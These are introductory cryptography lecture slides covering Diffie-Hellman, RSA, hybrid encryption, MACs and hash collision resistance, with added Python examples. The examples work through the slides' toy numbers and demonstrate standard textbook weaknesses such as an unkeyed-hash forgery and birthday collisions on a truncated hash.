[Figure; source: Wikipedia]
Why is Diffie-Hellman Secure?
• The security of Diffie-Hellman relies on the discrete logarithm problem being hard to solve.
• Given a prime p, a generator g, and the result of g raised to a secret exponent (i.e., A = g^a mod p), it is computationally infeasible to determine the secret exponent a given A, g, and p.
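The protocol of slides 82–84 carried through with both parties' messages, as an added example that is not part of the lecture notes. It uses the small numbers of the Wikipedia illustration the slides cite (p = 23, g = 5, secrets 4 and 3; all constructed toy values), and includes the exhaustive discrete-log search that shows why such parameters offer no security while a 2048-bit p does.

```python
"""Added example, not code from the course: a Diffie-Hellman run carried through
with both parties' messages, using the small numbers of the Wikipedia
illustration the slides cite (p = 23, g = 5, a = 4, b = 3), plus the
exhaustive discrete-log search that such toy parameters cannot resist."""
from typing import Optional, Tuple

# Constructed toy parameters; real deployments use p of 2048 bits or more.
P, G = 23, 5
ALICE_SECRET, BOB_SECRET = 4, 3


def dh_public(p: int, g: int, secret: int) -> int:
    """Public value g^secret mod p, the only thing sent over the open channel."""
    return pow(g, secret, p)


def dh_shared(p: int, peer_public: int, secret: int) -> int:
    """Shared secret peer_public^secret mod p: B^a = (g^b)^a = (g^a)^b = A^b."""
    return pow(peer_public, secret, p)


def public_value_ok(p: int, value: int) -> bool:
    """Sanity check on a received public value: 0, 1 and p-1 force a trivial secret."""
    return 2 <= value <= p - 2


def dh_exchange(p: int, g: int, a: int, b: int) -> Tuple[int, int, int, int]:
    """Run the protocol; returns (A, B, Alice's shared secret, Bob's shared secret)."""
    A = dh_public(p, g, a)          # Alice -> Bob: A
    B = dh_public(p, g, b)          # Bob -> Alice: B
    if not (public_value_ok(p, A) and public_value_ok(p, B)):
        raise ValueError("degenerate public value")
    return A, B, dh_shared(p, B, a), dh_shared(p, A, b)


def discrete_log(p: int, g: int, target: int) -> Optional[int]:
    """Exhaustive search for x with g^x = target (mod p): about p steps, so it is
    hopeless for a 2048-bit p, which is exactly what the slide's security argument needs."""
    x, power = 0, 1
    while x < p - 1:
        if power == target:
            return x
        power, x = power * g % p, x + 1
    return None


if __name__ == "__main__":
    A, B, s_alice, s_bob = dh_exchange(P, G, ALICE_SECRET, BOB_SECRET)
    print(f"A = {A}, B = {B}, shared = {s_alice} (Alice) / {s_bob} (Bob)")
    print("eavesdropper recovers a from A:", discrete_log(P, G, A))
```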
Attacks on Diffie-Hellman
• This is a key agreement, not authentication
– You don't know anything about who you have exchanged keys with
– Insecure against active attacks, e.g., man-in-the-middle
• Alice and Bob think they are talking directly to each other
• Mallory is actually performing two separate exchanges
Man-in-the-Middle Attack
[Figure]
• Frank intercepts and may alter messages between Alice and Bob.
• Attack compromises confidentiality and integrity of Alice and Bob's communication.
• Additional security measures required for authentication.
Elementary Cryptography
Public Key Cryptography
Asymmetric Encryption
• Public Key Cryptography
– a.k.a. asymmetric encryption
– Encryption and decryption with different keys
– Bob has a pair of public and private keys
– Bob's public key is known by Alice
• Alice uses Bob's public key to encrypt the message
C = E(Kpub, P)
P = D(Kpri, C) = D(Kpri, E(Kpub, P))
[Figure: plaintext message m → encryption algorithm with Kpub → ciphertext E(Kpub, m) → decryption algorithm with Kpri → plaintext D(Kpri, E(Kpub, m))]
Asymmetric Encryption
• Public Key Cryptography
– Public key: anyone can know
– Private key: only known to the owner
• The keys are inverses of each other:
– Anything encrypted with your public key can only be decrypted with your private key; it cannot be decrypted by your public key!
– Anything encrypted with your private key can only be decrypted with your public key; it cannot be decrypted with your private key!!
[Figure: plaintext message m → encryption algorithm with Kpub → ciphertext E(Kpub, m) → decryption algorithm with Kpri → plaintext D(Kpri, E(Kpub, m))]
Asymmetric Encryption
• What can we do with it?
– Encryption: keep your data secret
– Authentication: prove you are who you say you are (confirms a user's identity)
– Integrity: the message has not been changed
Asymmetric Encryption
• Encryption: keep your data secret
• Alice wants to send a message to Bob
– Only Bob should be able to read it
– Alice encrypts the message with Bob's public key.
– Bob decrypts the ciphertext with his private key.
[Figure: message m → encryption algorithm with KB_pub → E(KB_pub, m) → decryption algorithm with KB_pri → D(KB_pri, E(KB_pub, m))]
Asymmetric Encryption
• Authentication: prove you are who you say you are (a process that confirms a user's identity)
• Digital signatures
– Should work like handwritten signatures: verify the sender of the document
– Alice sends a message to Bob
– How can Alice prove that she is the real sender?
– Alice sends the message encrypted with her private key
– Bob decrypts with Alice's public key.
[Figure: message m → encryption algorithm with KA_pri → E(KA_pri, m) → decryption algorithm with KA_pub → plaintext]
Asymmetric Encryption
• Authentication: prove you are who you say you are (a process that confirms a user's identity)
• Digital signatures
– Could also send two copies:
– One clear
– One encrypted with Alice's private key
– Why?
[Figure: message m → encryption algorithm with KA_pri → m, E(KA_pri, m) → decryption algorithm with KA_pub → plaintext]
Asymmetric Encryption
• Authentication: prove you are who you say you are (a process that confirms a user's identity)
• Digital signatures
– Why?
• You can still read the message without decryption.
– Problem with it?
• The size of the message is doubled.
– Solution? No need to encrypt the entire message!
• Just a "digest" of the message.
[Figure: message m → encryption algorithm with KA_pri → m, E(KA_pri, m) → decryption algorithm with KA_pub → plaintext]
Asymmetric Encryption
• How to provide both confidentiality and authenticity?
– Alice both signs and encrypts the message
– Could either:
– E_A_pri(E_B_pub(M))
– or
– E_B_pub(E_A_pri(M))
[Figure: message m → encryption algorithm with KA_pri and KB_pub → decryption algorithm with KB_pri and KA_pub → plaintext]
RSA
• Diffie-Hellman key exchange (1976)
• Rivest (MIT), Shamir (Weizmann Institute), and Adleman (USC) published the RSA asymmetric encryption scheme in 1978
– 2002 Turing Award
• British Government Communications Headquarters
– James Ellis proposed "non-secret encryption" in 1970 (made public in 1997)
– Clifford Cocks proposed the same basic idea as RSA in 1973
– Malcolm Williamson developed a key distribution scheme similar to Diffie-Hellman key exchange in 1974
RSA
• RSA
– Key generation
– Encryption
– Decryption
RSA
• RSA Key generation
– Select two large primes p and q; (p != q)
– Calculate n = pq
– Calculate φ(n) = (p-1)(q-1)
• Euler's totient function.
– Select a random integer e, 1 < e < φ(n), and e is relatively prime to φ(n): gcd(e, φ(n)) = 1
– Compute d, 1 < d < φ(n), and d ≡ e^-1 mod φ(n)
• de ≡ 1 mod φ(n)
Public key: <e, n>
Private key: <d, n>
Note: p, q, and φ(n) should be thrown away!
RSA
• RSA Key generation
– Calculate φ(n) = (p - 1)(q - 1)
• Euler's totient function.
– φ(n): number of positive integers less than n that are relatively prime to n.
– When n = pq, and both p and q are prime numbers: φ(n) = (p-1)(q-1)
– When n is large, it's hard to compute φ(n) for an arbitrary n.
• No easier than factoring n
RSA
• RSA Encryption
– Given: message m, 0 < m < n, public key <e, n>
– Compute c = m^e mod n
• RSA Decryption
– Given: ciphertext c, and private key <d, n>
– Compute m = c^d mod n
RSA
• Why does RSA work?
• Decryption: c^d = (m^e)^d = m^(ed)
• In key generation:
d ≡ e^-1 mod φ(n) ➔ de ≡ 1 mod φ(n) ➔ de = kφ(n) + 1
• Hence,
c^d = m^(ed) = m^(kφ(n)+1) = m·(m^φ(n))^k
• Euler's theorem (the Fermat–Euler theorem or Euler's totient theorem):
m^φ(n) ≡ 1 mod n
• Therefore
m·(m^φ(n))^k ≡ m·(1)^k ≡ m (mod n)
(Euler's theorem assumes gcd(m, n) = 1; for the few m sharing a factor with n, the same conclusion follows by checking the congruence modulo p and modulo q separately and combining them with the Chinese remainder theorem.)
RSA
• Select two "large" primes p and q; (p != q)
– p = 17, q = 13
• Calculate n = pq
– n = 221
• Calculate φ(n) = (p-1)(q-1)
– 16*12 = 192
• Select a random integer e, 1 < e < φ(n), and e is relatively prime to φ(n): gcd(e, φ(n)) = 1
– Choose 11
• Compute d, 1 < d < φ(n), and d ≡ e^-1 mod φ(n)
– Pick 35: 35*11 = 385 = 2*192+1
Public key: <e, n> = <11, 221>
Private key: <d, n> = <35, 221>
RSA
• Encrypt: "MAIL"
– MAIL = {12, 0, 8, 11}
• Message needs to be converted to numeric type
– Public key: <e, n> = <11, 221>
– c = m^e mod n = m^11 mod 221
– c = {142, 0, 70, 97}
• Decrypt {142, 0, 70, 97}
– m = c^d mod n = c^35 mod 221
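The key generation, encryption and decryption steps of slides 101–111 carried through as an added example (not code from the course), with the slides' own numbers p = 17, q = 13, e = 11 and the message "MAIL"; d is computed with the extended Euclidean algorithm rather than picked by hand, and the A = 0 letter encoding is the slides'.

```python
"""Added example, not code from the course: textbook RSA carried through with
the slides' numbers (p = 17, q = 13, e = 11) and the "MAIL" message, with d
computed by the extended Euclidean algorithm instead of being picked by hand.
Textbook RSA has no padding and is shown for the arithmetic only."""
from math import gcd
from typing import List, Tuple

Key = Tuple[int, int]   # (exponent, n)


def ext_gcd(a: int, b: int) -> Tuple[int, int, int]:
    """Return (g, x, y) with a*x + b*y = g = gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    g, x, y = ext_gcd(b, a % b)
    return g, y, x - (a // b) * y


def mod_inverse(e: int, phi: int) -> int:
    """d with d*e = 1 (mod phi); exists only when gcd(e, phi) = 1."""
    g, x, _ = ext_gcd(e, phi)
    if g != 1:
        raise ValueError("e and phi(n) are not coprime")
    return x % phi


def rsa_keygen(p: int, q: int, e: int) -> Tuple[Key, Key]:
    """Slide 101: n = pq, phi(n) = (p-1)(q-1), d = e^-1 mod phi(n)."""
    if p == q:
        raise ValueError("p and q must differ")
    n, phi = p * q, (p - 1) * (q - 1)
    if not 1 < e < phi or gcd(e, phi) != 1:
        raise ValueError("need 1 < e < phi(n) and gcd(e, phi(n)) = 1")
    d = mod_inverse(e, phi)
    return (e, n), (d, n)      # public <e, n>, private <d, n>; p, q, phi are discarded


def rsa_encrypt(public: Key, m: int) -> int:
    e, n = public
    if not 0 <= m < n:         # the slides' alphabet maps A to 0, so 0 is allowed here
        raise ValueError("message block must be smaller than n")
    return pow(m, e, n)        # c = m^e mod n


def rsa_decrypt(private: Key, c: int) -> int:
    d, n = private
    return pow(c, d, n)        # m = c^d mod n


def encode(text: str) -> List[int]:
    """Slide 111's numeric form: A = 0, B = 1, ..., Z = 25."""
    return [ord(ch) - ord("A") for ch in text]


def decode(nums: List[int]) -> str:
    return "".join(chr(v + ord("A")) for v in nums)


def encrypt_text(public: Key, text: str) -> List[int]:
    return [rsa_encrypt(public, m) for m in encode(text)]


def decrypt_text(private: Key, cipher: List[int]) -> str:
    return decode([rsa_decrypt(private, c) for c in cipher])


if __name__ == "__main__":
    public, private = rsa_keygen(17, 13, 11)
    print("public", public, "private", private)
    print("MAIL ->", encrypt_text(public, "MAIL"))
    print("back  ->", decrypt_text(private, encrypt_text(public, "MAIL")))
```

Because the scheme is deterministic, the same letter always encrypts to the same value ("A" is always 0 here), which is the pattern leak that the PKCS padding mentioned on slide 114 exists to remove.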
RSA Security: Difficulty of Factoring
• Cryptanalysis:
• The security of RSA relies on the fact that
– while it's easy (computationally feasible) to multiply p and q together to get n
– it is extremely difficult to do the reverse, i.e., to factor n back into p and q, especially when p and q are large (hundreds of digits long).
RSA Security: Difficulty of Factoring
• Cryptanalysis:
• RSA is thought to be secure because:
– to find d (inverse of e mod φ(n), where n = pq)
• need to know φ(n) which is (p-1)(q-1)
• need to know p and q
– given n it's very difficult to find p and q
• difficulty of factoring n
• Quantum computers and Shor's algorithm?
• Note: when p and q are 100 decimal digits
– n is about 200 decimal digits
– millions of years of computer time needed to factor
RSA
• Cryptanalysis
– Textbook RSA vs. Public-Key Cryptography Standards (PKCS)
– 2003: Timing attack on OpenSSL
• Problem with protocol, not really RSA itself.
– 2012: "Ron is wrong, Whit is right"
• A paper by Arjen Lenstra, James Hughes, et al.
• "Public keys are shared among unrelated parties"
• 12,720 out of 6.4 million certificates "offer no security".
• Again, problem with RSA implementation.
RSA
• Problems with RSA
– Key distribution is still a problem
• Securely delivering the public key to the intended recipient and ensuring its authenticity
• Proving to whom a key belongs
• How does Bob know if the public key really belongs to Alice?
• How do you know if you are using the public key of Chase Bank, not "Cheat Bank"?
• Mallory could hand you a public key and claim it is Alice's…
RSA
• Problems with RSA
– Key distribution is still a problem
– Slow
• Look at the operations!
• keys must be much longer than symmetric keys to provide the same degree of security
• RSA – size of message to be encrypted is limited by n.
RSA vs. Symmetric Key Encryption
• Key Lengths: Security Comparison
– RSA's security is based on the difficulty of factoring the product of two large primes; requires longer keys for equivalent security (considered secure against brute-force attacks with current technology).
– Symmetric algorithms (e.g., AES) rely on different mathematical operations, allowing for shorter keys to achieve high security.
RSA vs. Symmetric Key Encryption
• Mathematical Foundation
– RSA: Security scales super-polynomially but sub-exponentially with key length.
– Symmetric: Doubling key length roughly squares the difficulty of brute-force attacks, offering an exponential security increase.
• Quantum Computing Impact
– RSA is theoretically vulnerable to quantum attacks (e.g., Shor's algorithm) that can factor large numbers efficiently.
– Symmetric keys are less affected by quantum computing; security is roughly halved, not broken.
CIS 4520
Introduction to
Cryptography
RSA vs. Symmetric Key Encryption

• Practical Key Lengths


Wenjing Zhang

– To achieve security comparable to a 128-bit


symmetric key (considered secure against
brute-force attacks with current technology),
RSA keys need to be several thousand bits
long.
– Example (as of the last update to cryptographic
standards):
– 2048-bit RSA keys are roughly equivalent to 112-bit
symmetric keys.
– 3072-bit RSA keys are considered comparable to
128-bit symmetric keys in computational effort to
break.

119
RSA + Symmetric Key

• Hybrid scheme (public key + session key)
  – Public key crypto is slow
  – Symmetric key crypto is fast, but has the key distribution problem
  – Solution:
    • Create a fresh symmetric key, called the session key
    • Encrypt the data with the session key
    • Encrypt the session key with the receiver's public key and send it along with the ciphertext
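The hybrid scheme just described, as an added worked example (the editor's Python, not code from the lecture). A textbook RSA key pair is built from two fixed Mersenne primes, 2^61 - 1 and 2^89 - 1, giving a 150-bit modulus; a random 128-bit session key is wrapped with the public key, and the session key drives the data encryption. The primes, the HMAC-SHA256 counter-mode keystream that stands in for AES (so the example needs only the Python standard library), and the encrypt-then-MAC layout are all assumptions made for illustration: the modulus is far too small for real use and textbook RSA has no padding, which is exactly the PKCS point made earlier.

```python
import hashlib
import hmac
import secrets
from math import gcd

# Toy RSA parameters (assumption, for illustration only): the Mersenne primes
# 2^61 - 1 and 2^89 - 1 give a ~150-bit modulus. Real keys use 2048+ bits and
# PKCS#1 padding; textbook RSA as used here is NOT secure.
P = (1 << 61) - 1
Q = (1 << 89) - 1
E = 65537


def rsa_keygen(p=P, q=Q, e=E):
    """Return ((n, e), (n, d)) for textbook RSA."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be invertible mod phi(n)")
    d = pow(e, -1, phi)            # modular inverse (Python 3.8+)
    return (n, e), (n, d)


def rsa_encrypt_int(m, pub):
    """c = m^e mod n. The message must be a number smaller than n: this is the
    'message size limited by n' restriction from the slides."""
    n, e = pub
    if not 0 <= m < n:
        raise ValueError("message too large for this modulus")
    return pow(m, e, n)


def rsa_decrypt_int(c, priv):
    n, d = priv
    return pow(c, d, n)


def _subkeys(session_key):
    """Derive separate encryption and MAC keys from the 128-bit session key."""
    enc_key = hashlib.sha256(b"enc" + session_key).digest()
    mac_key = hashlib.sha256(b"mac" + session_key).digest()
    return enc_key, mac_key


def keystream_xor(enc_key, nonce, data):
    """Toy stream cipher: HMAC-SHA256(key, nonce || counter) as the keystream.
    Stands in for AES; the same function encrypts and decrypts."""
    out = bytearray()
    for counter, offset in enumerate(range(0, len(data), 32)):
        block = hmac.new(enc_key, nonce + counter.to_bytes(8, "big"),
                         hashlib.sha256).digest()
        out.extend(b ^ k for b, k in zip(data[offset:offset + 32], block))
    return bytes(out)


def hybrid_encrypt(message, pub):
    """Encrypt the data with a fresh session key; wrap the session key with RSA."""
    session_key = secrets.token_bytes(16)          # 128-bit symmetric session key
    nonce = secrets.token_bytes(16)                # fresh per message: never reuse a keystream
    enc_key, mac_key = _subkeys(session_key)
    ct = keystream_xor(enc_key, nonce, message)
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    wrapped = rsa_encrypt_int(int.from_bytes(session_key, "big"), pub)
    return wrapped, nonce, ct, tag


def hybrid_decrypt(wrapped, nonce, ct, tag, priv):
    """Unwrap the session key with the private key, check the tag, then decrypt."""
    session_key = rsa_decrypt_int(wrapped, priv).to_bytes(16, "big")
    enc_key, mac_key = _subkeys(session_key)
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):     # constant-time comparison
        raise ValueError("MAC check failed: ciphertext was modified")
    return keystream_xor(enc_key, nonce, ct)


if __name__ == "__main__":
    pub, priv = rsa_keygen()
    msg = b"Meet at the usual place at nine. " * 50   # far larger than n allows directly
    parts = hybrid_encrypt(msg, pub)
    assert hybrid_decrypt(*parts, priv) == msg
    print("hybrid round trip OK; modulus bits:", pub[0].bit_length())
```

Note the check in rsa_encrypt_int: the 16-byte session key fits under n, but the 1.6 KB message in the demo does not, which is why the data goes through the symmetric cipher and only the key goes through RSA. The MAC is verified before anything is decrypted, so a modified ciphertext is rejected rather than decrypted to garbage.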
Reading Assignment for Next Class

• Chapter 11 Cryptographic Hash Functions, Sections 11.1 - 11.3 of Cryptography and Network Security: Principles and Practice. 2017. (7th Ed.) William Stallings. Pearson Education.
• Chapter 12 Message Authentication Codes, Sections 12.1 - 12.5 of Cryptography and Network Security: Principles and Practice. 2017. (7th Ed.) William Stallings. Pearson Education.
• Chapter 13 Digital Signatures, Section 13.1 of Cryptography and Network Security: Principles and Practice. 2017. (7th Ed.) William Stallings. Pearson Education.
Elementary Cryptography

Data Integrity
Message Authentication Codes

• A small block appended to the message for authentication
      MAC = C_K(M)
  – C: the MAC function
  – K: the shared secret key
  – M: the message
• The block is called
  – a cryptographic checksum, or
  – a Message Authentication Code (MAC)
• MACs verify
  – that the message came from A (the other holder of K)
  – that the message has not been altered

An Example of MAC Use

[Figure: the sender computes MAC = C_K(M) and transmits M together with the MAC; the receiver recomputes C_K(M) over the received message with the shared key K and compares it with the received MAC. Source: Wikipedia]
Cryptographic Hash Functions

• Hash functions take a message as input
  – The message may be of any length
  – The output is a string/number of fixed length
• Sometimes called message digest functions
• The hash result is called the digest or fingerprint
• Cryptographic hashes ≠ the hash functions used in hash tables
  – Cryptographic features!

[Figure: a cryptographic hash function (specifically SHA-1) at work. A small change in the input (in the word "over") drastically changes the output (digest). This is called the avalanche effect. Source: Wikipedia]
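The avalanche effect can be measured rather than eyeballed. The following added example (the editor's, not code from the lecture) hashes two constructed sentences that differ in a single bit of the word "over" and counts how many of the 256 digest bits change; about half of them do, which is what a good hash should deliver no matter how small the input change is.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hamming_distance_bits(a: bytes, b: bytes) -> int:
    """Number of bit positions in which two equal-length byte strings differ."""
    if len(a) != len(b):
        raise ValueError("inputs must have equal length")
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def avalanche(msg1: bytes, msg2: bytes, algorithm: str = "sha256") -> dict:
    """Hash both messages and report how many input bits and digest bits differ.
    For a good hash the digest distance is close to half the digest length
    regardless of how small the input change is."""
    h1 = hashlib.new(algorithm, msg1).digest()
    h2 = hashlib.new(algorithm, msg2).digest()
    same_length = len(msg1) == len(msg2)
    return {
        "input_bits_changed": hamming_distance_bits(msg1, msg2) if same_length else None,
        "digest_bits_changed": hamming_distance_bits(h1, h2),
        "digest_bits_total": 8 * len(h1),
    }


# Constructed sample inputs: the sentences differ in one character of "over"
# ('e' -> 'a' is a single-bit change in ASCII), as in the lecture's figure.
MSG_A = b"The quick brown fox jumps over the lazy dog"
MSG_B = b"The quick brown fox jumps ovar the lazy dog"


def demo():
    return avalanche(MSG_A, MSG_B)


if __name__ == "__main__":
    print(sha256_hex(MSG_A))
    print(sha256_hex(MSG_B))
    print(demo())
```

The same function works for any algorithm name hashlib knows (pass "md5" or "sha1" to see that the broken algorithms still have a perfectly good avalanche property: avalanche is necessary, not sufficient).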
Cryptographic Hash Functions

• Cryptographic hashes ≠ the hash functions used in hash tables
• Cryptographic hashes are one way:
  – Given M, it is easy to compute H(M)
  – Given H(M), it should be very difficult to produce M
  – or any M' ≠ M where H(M') = H(M)
    • such a pair (M, M') is called a "collision"
  – Implies that hash values are (close to) uniformly distributed over the output space
• Example cryptographic hashes:
  – Insecure: MD5 – 128 bits; SHA-1 – 160 bits
  – SHA-2 (224, 256, 384, 512 bits); SHA-3 (224, 256, 384, 512 bits)
Cryptographic Hash Functions

• Hash Functions for Authentication
  – Can we use a hash function as an authenticator?
    • Just send M + H(M)?
    • No: the bad guy replaces the pair with M' + H(M')
    • Again: the hash function (the crypto algorithm) is public, so anyone can compute H(M')
  – Try this:
    • Send: M + E_Apri(H(M)), i.e., Alice encrypts the digest with her private key (a digital signature)
    • Or: H(secret + M), a keyed hash that only the holders of the secret can compute (in practice the keyed construction used is HMAC)
  – Can I use Bob's public key instead?
    • Send: M + E_Bpub(H(M))?
    • No: anyone can compute H(M') and encrypt it with Bob's public key, so this proves nothing about who sent the message
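To make the two authenticator designs concrete, here is an added example (the editor's Python, not code from the lecture): the unkeyed M + H(M) scheme, which Mallory defeats by recomputing the hash over her own message, next to the keyed scheme MAC = C_K(M) with C = HMAC-SHA256 from the standard library. HMAC is used rather than a literal H(secret || M) because, with SHA-1 and SHA-2, that plain prefix construction is subject to length-extension attacks; the messages and the 32-byte random key are constructed for the demo.

```python
import hashlib
import hmac
import secrets


def unkeyed_tag(message: bytes) -> bytes:
    """The 'just send M + H(M)' idea: the tag depends on the message only."""
    return hashlib.sha256(message).digest()


def receiver_accepts_unkeyed(message: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(unkeyed_tag(message), tag)


def forge_unkeyed(new_message: bytes):
    """Mallory's move against M + H(M): the hash function is public, so she
    simply sends (M', H(M')) and the receiver's check passes."""
    return new_message, unkeyed_tag(new_message)


def mac_tag(key: bytes, message: bytes) -> bytes:
    """MAC = C_K(M) with C = HMAC-SHA256. HMAC is the standard way to key a
    hash; a plain H(secret || M) built on SHA-1/SHA-2 lets an attacker append
    to M without knowing the secret (length extension), which HMAC's nested
    construction prevents."""
    return hmac.new(key, message, hashlib.sha256).digest()


def mac_verify(key: bytes, message: bytes, tag: bytes) -> bool:
    """Recompute the tag over the received message and compare in constant
    time, so an early-exit comparison cannot leak how much of a guess matched."""
    return hmac.compare_digest(mac_tag(key, message), tag)


def demo():
    """Run both schemes against the same forgery attempt. Returns four booleans:
    (unkeyed forgery accepted, genuine MAC accepted,
     forged message with replayed tag rejected, forged message with guessed tag rejected)."""
    key = secrets.token_bytes(32)                  # shared only by Alice and Bob
    msg = b"transfer $100 to Alice"                # constructed sample message
    forged = b"transfer $100 to Mallory"           # what Mallory wants Bob to accept

    # Scheme 1: M + H(M). The forgery goes through.
    m2, t2 = forge_unkeyed(forged)
    unkeyed_forgery_accepted = receiver_accepts_unkeyed(m2, t2)

    # Scheme 2: M + HMAC_K(M). Mallory does not know K, so she can only replay
    # Alice's tag or compute an unkeyed hash; Bob rejects both.
    tag = mac_tag(key, msg)
    genuine_ok = mac_verify(key, msg, tag)
    replay_rejected = not mac_verify(key, forged, tag)
    guess_rejected = not mac_verify(key, forged, unkeyed_tag(forged))
    return unkeyed_forgery_accepted, genuine_ok, replay_rejected, guess_rejected


if __name__ == "__main__":
    print(demo())   # (True, True, True, True)
```

Two practitioner details are in the code rather than on the slide: the comparison is constant-time (hmac.compare_digest), and the receiver recomputes the tag over the message it actually received, never trusting anything that arrived alongside it.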
Cryptographic Hash Functions

• Collision Resistance
  – A hash is many-to-one, so it is never collision free
  – "Birthday paradox"
  – After a number of attempts, the adversary may find a collision
  – How many attempts? For an n-bit digest, about 2^(n/2) (the square root of the number of possible outputs), not 2^n
  – Weak Collision Resistance (second-preimage resistance): given m, it is difficult to find m' ≠ m such that H(m') = H(m).
  – Strong Collision Resistance: it is computationally infeasible to find any pair m1 ≠ m2 such that H(m1) = H(m2).
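An added example (the editor's Python, not code from the lecture) that makes the two attack costs visible. SHA-256 is deliberately truncated to a few bits so that a collision turns up in a fraction of a second; the truncation widths and the input naming scheme are assumptions for the demo, and the dictionary-based search is the simplest form of a birthday attack, not how a serious one is implemented.

```python
import hashlib
import math


def truncated_hash(data: bytes, bits: int) -> int:
    """SHA-256 truncated to its first `bits` bits. Deliberately weak so that the
    birthday bound can be observed quickly (assumption: a real hash has 224+
    bits, where neither search below would ever finish)."""
    digest = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return digest >> (256 - bits)


def expected_birthday_attempts(bits: int) -> float:
    """Expected inputs until the first collision among 2^bits values:
    sqrt(pi/2 * 2^bits). For SHA-256 that is about 1.25 * 2^128, not 2^256."""
    return math.sqrt(math.pi / 2 * 2 ** bits)


def find_collision(bits: int, max_attempts: int = 1_000_000):
    """Strong-collision search (birthday attack): hash distinct inputs and stop
    at the first repeated digest. Returns (m1, m2, attempts) or None. Memory
    grows with the attempts; a real attacker uses cycle finding, not a table."""
    seen = {}
    for i in range(max_attempts):
        m = b"msg-%d" % i                 # constructed, guaranteed-distinct inputs
        h = truncated_hash(m, bits)
        if h in seen:
            return seen[h], m, i + 1
        seen[h] = m
    return None


def find_second_preimage(target: bytes, bits: int, max_attempts: int = 1_000_000):
    """Weak-collision search: given m, look for m' != m with the same digest.
    Expected cost is about 2^bits attempts, the square of the birthday cost,
    because every attempt must hit one specific value."""
    goal = truncated_hash(target, bits)
    for i in range(max_attempts):
        m = b"alt-%d" % i
        if m != target and truncated_hash(m, bits) == goal:
            return m, i + 1
    return None


if __name__ == "__main__":
    bits = 24
    m1, m2, tries = find_collision(bits)
    print(f"{bits}-bit collision after {tries} tries "
          f"(expected about {expected_birthday_attempts(bits):.0f})")
    print(m1, m2, truncated_hash(m1, bits) == truncated_hash(m2, bits))
    print("16-bit second preimage:", find_second_preimage(b"msg-0", 16))
```

Run with the same number of bits for both searches and the asymmetry is plain: a 24-bit collision needs a few thousand hashes, while a 24-bit second preimage needs on the order of sixteen million. This is why digest sizes are chosen so that n/2 bits, not n, meets the target security level.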
Collision Resistance in Hash Functions

• Data Uniqueness:
  – Makes it infeasible to find two inputs with the same hash, so the digest can serve in practice as an identifier of the data.
• Forgery Prevention:
  – Stops attackers from creating deceptive data with a legitimate hash, securing digital signatures and certificates.
• Data Integrity:
  – Ensures that any alteration of the data changes the hash, preventing undetected tampering.
• Authentication Security:
  – Maintains the reliability of authentication protocols that depend on hash values.
• Protocol Efficiency:
  – Allows cryptographic protocols to operate on compact hash values instead of large data sets.
• Digital Signature Protection:
  – Prevents signature forgery by making it infeasible to find two documents with the same hash.
• PKI Trust:
  – Supports the integrity of the Public Key Infrastructure by preventing certificate collisions.
• Blockchain Stability:
  – Supports the security of blockchain transactions and mining processes.
Reading Assignment for Next Class

• Chapter 14 Key Management and Distribution, Sections 14.1 - 14.5 of Cryptography and Network Security: Principles and Practice. 2017. (7th Ed.) William Stallings. Pearson Education.
• Chapter 15 User Authentication, Sections 15.1 - 15.4 of Cryptography and Network Security: Principles and Practice. 2017. (7th Ed.) William Stallings. Pearson Education.
CIS 4520 Introduction to Cryptography

Classical Cryptography

Wenjing Zhang
[email protected]
Topics in Cryptography

• Basic Concepts
• Classical cryptography
• Modern cryptography

Elementary Cryptography

Introduction
Elementary Cryptography

• Cryptography: an important tool
• Rooted in some heavy-duty math
  – number theory
  – group & field theory
  – computational complexity
  – probability
• Our goal:
  – be able to correctly and intelligently use crypto
  – not to design/break cryptosystems

Security Goals (CIA)

• Confidentiality: only the sender and the intended receiver "understand" the message contents
  – the sender encrypts the message
  – the receiver decrypts the message
• Message Integrity: sender and receiver want to ensure the message is not altered (in transit, or afterwards) without detection
• End-point Authentication: sender and receiver want to confirm each other's identity
Terminology

• Cryptography: encipherment, digital signature, authentication exchange, ...
  – S: sender (Alice)
  – R: recipient (Bob)
  – O: outsider or intruder
    • Chuck: general intruder; Eve: eavesdropper; Mallory: malicious attacker
  – O might try to: block, intercept, modify, fabricate

[Figure: plaintext → encryption algorithm (Alice's encryption key K_A) → ciphertext → decryption algorithm (Bob's decryption key K_B) → plaintext]
Terminology

• Cryptosystem
  – Cryptographic algorithm (a.k.a. cipher): algorithm(s) that take a key and convert plaintext to ciphertext and back.
    • The algorithm(s) used for encryption and decryption.
  – Cryptosystem:
    • the cryptographic algorithm
    • the set of all possible plaintexts
    • the set of all possible ciphertexts
    • the set of all possible keys

• Cryptosystem
  – You need to know:
    • Plaintext: P (characters? numbers? bits?)
    • Ciphertext: C
    • Key: K
    • Encryption (encipher): C = E(P, K), also written C = E_K(P) or C = Enc_K(P)
    • Decryption (decipher): P = D(C, K) = D(E(P, K), K)

• Cryptosystem
  – FYI: mathematical representation of a cryptosystem
    • K = {0, 1}^l            (keys are l-bit strings)
    • P = {0, 1}^m            (plaintexts are m-bit strings)
    • C ⊆ C', C' = {0, 1}^n   (ciphertexts are n-bit strings)
    • E : P × K → C
    • D : C × K → P
    • ∀p ∈ P, k ∈ K : D(E(p, k), k) = p
    • It is infeasible to find F : P × C → K (i.e., to recover the key from plaintext/ciphertext pairs)
Terminology

• Cryptology: Cryptography + Cryptanalysis
• Cryptanalysis is the study of methods for obtaining the meaning of encrypted information without access to the secret information
  – "hacking"

Cryptography and Cryptanalysis

• For a good cryptosystem it should be infeasible to
  – enumerate all possible keys
  – find the key from any reasonable amount of ciphertext and plaintext by enumerating possible keys
  – produce plaintext from ciphertext without the key
  – distinguish ciphertext from truly random values

• What should be kept secret?
  – Keys
  – Cipher algorithms?
Cryptography and Cryptanalysis

• Restricted Algorithms
  – The algorithm itself is secret
  – The security of the algorithm relies on its secrecy
  • Not good practice:
    – can't be used by a large or changing group
    – if one person accidentally reveals the algorithm, everyone must change
    – different groups need different algorithms
    – it is difficult to design (and prove) good algorithms
    – the people who design the cipher != the people who use the cipher

• Kerckhoffs' Principle
